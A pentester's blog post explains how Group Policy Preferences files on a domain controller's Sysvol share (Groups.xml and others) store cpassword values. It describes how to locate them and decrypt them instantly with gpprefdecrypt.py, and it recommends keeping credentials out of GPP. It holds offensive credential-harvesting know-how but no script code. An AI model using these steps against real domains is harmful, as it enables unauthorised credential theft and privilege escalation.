Decrypting Windows 2008 GPP user passwords using Gpprefdecrypt.py

[leonteale]

This tool decrypts the cpassword attribute value embedded in the Groups.xml file stored in the domain controller’s Sysvol share.

Very briefly, we will be discussing how Group Policy Preferences can be used to create local users on machines and just how quickly we can crack the embedded cpass hash.As far as i’m aware, by design the Groups.xml will store the local administrator account user and password hash. However, after further research and experiences of my colleagues there are other similar .xml files which hold other user account names and hashes for different purposes.

For example, there are .xml files used for specific ‘Services’, that will hold the account needed to run said service. Other .xml files include credentials and configuration settings for ‘Printers‘ and ‘Drives‘. Further research suggests there are possible .xml files for ‘ScheduledTasks’ and ‘DataSources‘ although i have yet to see these on any pentests I have performed



Above is a Groups.xml file taken from a test lab i created some time ago. The important items within this file are:

• Group name
• Username
• Cpassword

The above information will show you the user and group used for the specific policy and of course the Cpassword (often referred to as Cpass).To find the Groups.xml file your going to have to search the Sysvol folder of a domain controller mainly. You will very likely need domain credentials to be able to access this share. Simply browse to the server share and you should see the folder for Sysvol if it exists or is accessible using the credentials you have supplied. If using windows you can simply ‘search’ for groups.xml. However, you might find searching *.xml will yield more results.

Now as common as this method is to roll out user credentials for specific services Microsoft, for what ever reason!?, decided to release the key to decrypting this password.
http://msdn.microsoft.com/en-us/library/2c15cbf0-f086-4c74-8b70-1f2fa45dd4be.aspx
Now you may think
“Well why is this any different to cracking any other password hash?”
Well, the time taken to crack any cpass is less than a second, no matter the complexity.


Usage for gpprefdecrypt.py is easy. simply call the script and give it the hash.

References
Gprefdecrypt.py can be found on my pastebin as mirrors to the script are often down.
There is a Ruby version of this script for use with the new Kali Linux distribution.
http://carnal0wnage.attackresearch.com/2012/10/group-policy-preferences-and-getting.html


So what can you do to protect yourself from this exploit?
Simple, do not specify user credentials within Group Preference Policies.
I would like to send out a thank you to the below people for making this post possible

• My collegues for their input into the groups.xml exploit
• Loic Jaquemet for his work with gpprefdecrypt.py
• Microsoft for providing yet another quick and easy method of getting system on a pentest